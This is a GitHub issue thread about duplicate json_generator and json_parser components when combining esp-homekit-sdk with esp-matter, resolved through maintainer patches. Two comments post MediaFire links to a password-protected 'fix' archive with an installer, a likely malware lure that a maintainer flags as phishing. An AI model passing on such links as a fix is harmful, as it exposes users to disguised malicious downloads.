espressif/esp-matter #1066: Cannot process component requirements.  Multiple candidates to   satisfy project requirements

0xdharanesh, 2024-08-28:
"$ENV{IDF_PATH}/components/esp-homekit-sdk/components/homekit"

am alredy using the apple home kit in my ESP-IDF project 

now i want to add the 

"${ESP_MATTER_PATH}/components"
"${ESP_MATTER_PATH}/examples/common"
"${MATTER_SDK_PATH}/config/esp32/components"
${extra_components_dirs_append}

matter protocol in the project 

when i head to add this 

CMake Error at /home/dharanesh/esp/esp-idf/tools/cmake/component.cmake:251 (message):
  ERROR: Cannot process component requirements.  Multiple candidates to
  satisfy project requirements:

    requirement: "json_generator" candidates: "espressif__json_generator, json_generator"
    requirement: "json_parser" candidates: "json_parser, espressif__json_parser"

i got this error how to resolve it

and this is my components CmakeLists.txt

 

      cmake_minimum_required(VERSION 3.16)
      
      if(NOT DEFINED ENV{ESP_MATTER_PATH})
          message(FATAL_ERROR "Please set ESP_MATTER_PATH to the path of esp-matter repo")
      endif(NOT DEFINED ENV{ESP_MATTER_PATH})
      
      set(PROJECT_VER "1.0")
      set(PROJECT_VER_NUMBER 1)
      
      set(ESP_MATTER_PATH $ENV{ESP_MATTER_PATH})
      set(MATTER_SDK_PATH ${ESP_MATTER_PATH}/connectedhomeip/connectedhomeip)
      
      include($ENV{IDF_PATH}/tools/cmake/project.cmake)
      include(${ESP_MATTER_PATH}/examples/common/cmake_common/components_include.cmake)
      
      set(EXTRA_COMPONENT_DIRS 
          "$ENV{IDF_PATH}/components/esp-aws-iot/libraries/coreMQTT"
	      "$ENV{IDF_PATH}/components/esp-aws-iot/libraries/common/posix_compat"
	      "$ENV{IDF_PATH}/components/esp-aws-iot/libraries/backoffAlgorithm"	
	      "$ENV{IDF_PATH}/components/esp-homekit-sdk/components/homekit"
	      "$ENV{IDF_PATH}/components/esp-homekit-sdk/examples/common"
	      "${ESP_MATTER_PATH}/components"
	      "${ESP_MATTER_PATH}/examples/common"
	      "${MATTER_SDK_PATH}/config/esp32/components"
	      ${extra_components_dirs_append})
      
      message(STATUS "EXTRA_COMPONENT_DIRS is : ${EXTRA_COMPONENT_DIRS}")
      
      project(code-flow)
      
      idf_build_set_property(CXX_COMPILE_OPTIONS "-std=gnu++17;-Os;-DCHIP_HAVE_CONFIG_H;-Wno-overloaded-virtual" APPEND)
      idf_build_set_property(C_COMPILE_OPTIONS "-Os" APPEND)
      idf_build_set_property(COMPILE_OPTIONS "-Wno-format-nonliteral;-Wno-format-security" APPEND)
      
      target_add_binary_data(${CMAKE_PROJECT_NAME}.elf "main/soul/root_cert_auth.crt" TEXT)
      target_add_binary_data(${CMAKE_PROJECT_NAME}.elf "main/soul/client.crt" TEXT)
      target_add_binary_data(${CMAKE_PROJECT_NAME}.elf "main/soul/client.key" TEXT)
      
      set(PARTITION_TABLE_CSV ${CMAKE_CURRENT_LIST_DIR}/partitions.csv)
      set(CMAKE_VERBOSE_MAKEFILE ON)
      set_property(GLOBAL APPEND PROPERTY EXTRA_PARTITION_TABLES ${PARTITION_TABLE_CSV})

HeinousAgenda38, 2024-08-28:
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

0xdharanesh, 2024-08-28:
@HeinousAgenda38 am using linux OS 
why do i install this ?
what is this ?

qiliq, 2024-08-28:
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

0xdharanesh, 2024-08-28:
@qiliq what would it do explain me 
why do i install

shubhamdp, 2024-08-28:
@0xdharanesh Please ignore them, looks like spam/phish

0xdharanesh, 2024-08-28:
@shubhamdp can i get a solution for my issue

0xdharanesh, 2024-08-29:
@shubhamdp can we modify the  requirement

shubhamdp, 2024-08-29:
@0xdharanesh please give us some time to analyze and come back with a solution

0xdharanesh, 2024-08-30:
@0xdharanesh yes please i need it

0xdharanesh, 2024-09-04:
@shubhamdp any update on it

shubhamdp, 2024-09-06:
@0xdharanesh Looking into it, please give us some time to work on this problem

shubhamdp, 2024-09-12:
@0xdharanesh can you please try below patch in the esp-homekit-sdk, path is attached in this comment.

```
cd esp-homekit-sdk
git am 0001-Use-json-generator-and-parser-from-component-registr.patch

# If json_generator or json_parser directories are still present, just remove them
rm -r components/homekit/json_{generator,parser}
```

Here's the minimal patch on top of `examples/fan/CMakeLists.txt` and ``examples/fan/main/CMakeLists.txt``
```
diff --git a/examples/fan/CMakeLists.txt b/examples/fan/CMakeLists.txt
index 6a2fb34..f814078 100644
--- a/examples/fan/CMakeLists.txt
+++ b/examples/fan/CMakeLists.txt
@@ -5,13 +5,21 @@
 # in this exact order for cmake to work correctly
 cmake_minimum_required(VERSION 3.5)

+set(PROJECT_VER "1.0")
+set(PROJECT_VER_NUMBER 1)
+
 if(DEFINED ENV{HOMEKIT_PATH})
   set(HOMEKIT_PATH $ENV{HOMEKIT_PATH})
 else()
   set(HOMEKIT_PATH ${CMAKE_CURRENT_LIST_DIR}/../..)
 endif(DEFINED ENV{HOMEKIT_PATH})

-set(EXTRA_COMPONENT_DIRS ${HOMEKIT_PATH}/components ${HOMEKIT_PATH}/components/homekit ${CMAKE_CURRENT_LIST_DIR}/../common)
+set(MATTER_SDK_PATH $ENV{ESP_MATTER_PATH}/connectedhomeip/connectedhomeip)
+set(EXTRA_COMPONENT_DIRS ${HOMEKIT_PATH}/components ${HOMEKIT_PATH}/components/homekit ${CMAKE_CURRENT_LIST_DIR}/../common $ENV{ESP_MATTER_PATH}/components $ENV{ESP_MATTER_PATH}/connectedhomeip/connectedhomeip/config/esp32/components)

 include($ENV{IDF_PATH}/tools/cmake/project.cmake)
 project(fan)
+
+idf_build_set_property(CXX_COMPILE_OPTIONS "-std=gnu++17;-Os;-DCHIP_HAVE_CONFIG_H;-Wno-overloaded-virtual" APPEND)
+idf_build_set_property(C_COMPILE_OPTIONS "-Os" APPEND)
+idf_build_set_property(COMPILE_OPTIONS "-Wno-format-nonliteral;-Wno-format-security" APPEND)
diff --git a/examples/fan/main/CMakeLists.txt b/examples/fan/main/CMakeLists.txt
index 7fb6738..2d0a4af 100644
--- a/examples/fan/main/CMakeLists.txt
+++ b/examples/fan/main/CMakeLists.txt
@@ -1 +1,4 @@
 idf_component_register(SRCS ./app_main.c)
+
+set_property(TARGET ${COMPONENT_LIB} PROPERTY CXX_STANDARD 17)
+target_compile_options(${COMPONENT_LIB} PRIVATE "-DCHIP_HAVE_CONFIG_H")
```

you will have to source below scripts before building
```
source /path/to/esp-idf/export.sh
source /path/to/esp-matter/export.sh
cd /path/to/your/example
idf.py build
```

[0001-Use-json-generator-and-parser-from-component-registr.patch](https://github.com/user-attachments/files/16979990/0001-Use-json-generator-and-parser-from-component-registr.patch)

shubhamdp, 2024-09-13:
@0xdharanesh can you please provide a few more information 

esp-idf commit id
esp-homekit-sdk commit id
esp-matter commit id

0xdharanesh, 2024-09-16:
@shubhamdp 

I had already fixed the issue in a similar way before receiving your message, but I waited for your response to confirm or to see if there was a better way to resolve it.

I manually deleted the json-generator-and-parser and also Modify them on SDK's  idf_component.yml. After that, everything worked well.

Here are the details:

esp-idf commit ID: cc3203dc4f087ab41b434afff1ed7520c6d90993
esp-homekit-sdk commit ID: 43bab6f68569e26c738f0273960200c809ec0ec9
esp-matter commit ID: a4739acde12cd3e8c845e449986c7540d1a83307
All of these were the latest stable versions i think.

Thank you for your help, @shubhamdp !

shubhamdp, 2024-09-16:
@0xdharanesh working on fixing it, but it may take some time, as this needs to be supported on prior IDF versions as well.

0xdharanesh, 2024-09-17:
@shubhamdp okey

shubhamdp, 2024-09-17:
@0xdharanesh can you try please with the attached patch?

[fix-homekit-and-multiple-components.patch](https://github.com/user-attachments/files/17028492/fix-homekit-and-multiple-components.patch)

0xdharanesh, 2024-10-08:
> I had already fixed the issue in a similar way before receiving your message, but I waited for your response to confirm or to see if there was a better way to resolve it.

and now i have switched to [Connecthomeip](https://github.com/project-chip/connectedhomeip)
Because i have planed to create a virtual bridge
from this SDK i can't  figure it out if it work with google but not with alexa in homekit its have many issues so i am developing with [bridge-app/esp32] (https://github.com/project-chip/connectedhomeip/tree/master/examples/bridge-app/esp32)

thanks @shubhamdp @dhrishi

closed 2024-10-08 by 0xdharanesh